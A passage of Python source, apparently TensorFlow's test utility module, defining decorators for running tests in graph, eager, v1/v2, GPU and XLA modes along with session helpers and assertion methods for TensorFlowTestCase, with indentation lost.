def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
return ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.get_default_graph()._building_function:
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if tf2.enabled():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the precense
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function would
also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
was build with CUDA support.
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since routine will
return true when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support. However no changes here because
++ Changing the name "cuda_only" to something more generic would break
backward compatibility
++ Adding an equivalent "rocm_only" would require the implementation check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evalaute `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def use_deterministic_cudnn(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CUDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = os.environ.get("TF_CUDNN_DETERMINISTIC", "")
os.environ["TF_CUDNN_DETERMINISTIC"] = "true"
result = f(self, *args, **kwargs)
os.environ["TF_CUDNN_DETERMINISTIC"] = original_var
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tensorflow.TF_GetXlaConstantFoldingDisabled()
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# The description is just for documentation purposes.
def disable_xla(description):
def disable_xla_impl(func):
"""Execute the test method only if xla is not enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_xla_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
def no_xla_auto_jit_impl(func):
"""This test is not intended to be run with XLA auto jit enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Skip test if using XLA is forced.
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return no_xla_auto_jit_impl
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tensorflow.TF_SetXlaAutoJitMode("2")
pywrap_tensorflow.TF_SetXlaMinClusterSize(1)
pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(False)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(True)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
context.context().summary_writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
